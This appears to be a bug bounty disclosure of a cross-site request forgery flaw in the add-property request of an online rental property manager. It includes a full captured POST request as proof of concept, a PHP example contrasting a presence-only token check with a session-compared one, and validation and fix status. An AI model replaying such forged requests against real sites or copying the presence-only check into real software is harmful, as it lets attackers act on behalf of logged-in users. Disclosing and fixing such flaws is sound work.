Cross-Site Request Forgery (CSRF) in bigprof-software/online-rental-property-manager

Status: Valid
Reported on: Aug 4th 2021

✍️ Description

CSRF bug in the add-property request (properties_view.php).

🕵️‍♂️ Proof of Concept

The request below is vulnerable to a CSRF attack.
Although a csrf_token field is present in the request, it is not checked on the server side: any attacker-supplied csrf_token value is accepted.

POST /online-rental/app/properties_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38437840593695382254572995149
Content-Length: 2917
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/properties_view.php?filterer_owner=1&addNew_x=1&Embedded=1
Cookie: 
Upgrade-Insecure-Requests: 1
Account: test2

-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="Embedded"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="csrf_token"

41c0d66e879e60346c9223ebedcd003a
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="filterer_owner"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="current_view"

DV
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SortField"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SelectedID"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SelectedField"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SortDirection"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="FirstRecord"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="NoDV"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="PrintDV"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="property_name"

property1_by_user
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="type"

Residential
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="number_of_units"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="owner"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="country"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="street"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="City"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="State"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="ZIP"


-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="insert_x"

1
-----------------------------38437840593695382254572995149
Content-Disposition: form-data; name="SearchString"


-----------------------------38437840593695382254572995149--
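
A server-side fix for the flaw described above, written as an added example and not code from online-rental-property-manager: the presence-only pattern that matches the reported behaviour sits beside a hardened check that compares the submitted csrf_token with a per-session token. The function names, the session key and the use of PHP sessions are assumptions.

```php
<?php
// Added example (not the project's code): server-side CSRF token handling for a
// state-changing form such as the add-property POST to properties_view.php.
// Assumptions: PHP sessions are in use and the form field is named csrf_token
// (the field name seen in the captured request). Function names are hypothetical.

session_start();

// Issue one random token per session and embed it in the form as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Vulnerable pattern (matches the report): the field is only tested for
// presence and never compared to anything, so any value is accepted.
function csrf_check_vulnerable(array $post): bool {
    return isset($post['csrf_token']);
}

// Hardened pattern: the submitted value must equal the session token.
// A missing session token or a missing/mismatching field rejects the request;
// hash_equals() performs the comparison in constant time.
function csrf_check(array $post): bool {
    $expected  = $_SESSION['csrf_token'] ?? '';
    $submitted = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($submitted) || $submitted === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Usage at the top of the insert handler, before any database write.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['insert_x'])) {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... proceed to insert the property ...
}
```

The hidden field is emitted with `<?= htmlspecialchars(csrf_token()) ?>` when the form is rendered, so the value the browser sends back is the one the session issued.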

💥 Impact

CSRF on the add-property request: because the csrf_token value is not validated server-side, the request can be forged for a logged-in user.

We have contacted a member of the bigprof-software/online-rental-property-manager team and are waiting to hear back 4 months ago
BigProf Software validated this vulnerability 3 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software confirmed that a fix has been merged on f45953 3 months ago
BigProf Software has been awarded the fix bounty